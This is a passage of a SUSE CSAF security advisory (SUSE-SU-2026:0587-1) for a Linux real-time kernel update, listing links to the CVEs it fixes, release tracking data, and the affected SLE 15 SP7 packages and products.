"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39836 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40166 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40177 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40181 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-20T10:04:28Z",
"generator": {
"date": "2026-02-20T10:04:28Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:0587-1",
"initial_release_date": "2026-02-20T10:04:28Z",
"revision_history": [
{
"date": "2026-02-20T10:04:28Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"product": {
"name": "kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"product_id": "kernel-devel-rt-6.4.0-150700.7.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"product": {
"name": "kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"product_id": "kernel-source-rt-6.4.0-150700.7.31.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-devel-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-extra-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-extra-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-extra-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-livepatch-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-livepatch-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-devel-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-livepatch-devel-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-livepatch-devel-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-optional-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-optional-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-optional-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-vdso-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kernel-rt-vdso-6.4.0-150700.7.31.2.x86_64",
"product_id": "kernel-rt-vdso-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"product": {
"name": "kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"product_id": "kernel-syms-rt-6.4.0-150700.7.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "kselftests-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "kselftests-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product": {
"name": "reiserfs-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"product_id": "reiserfs-kmp-rt-6.4.0-150700.7.31.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Real Time Module 15 SP7",
"product": {
"name": "SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-rt:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64"
},
"product_reference": "cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64"
},
"product_reference": "dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
},
"product_reference": "gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-rt-6.4.0-150700.7.31.1.noarch as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch"
},
"product_reference": "kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64"
},
"product_reference": "kernel-rt-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64"
},
"product_reference": "kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-6.4.0-150700.7.31.1.noarch as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch"
},
"product_reference": "kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-rt-6.4.0-150700.7.31.1.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64"
},
"product_reference": "kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64 as component of SUSE Real Time Module 15 SP7",
"product_id": "SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
},
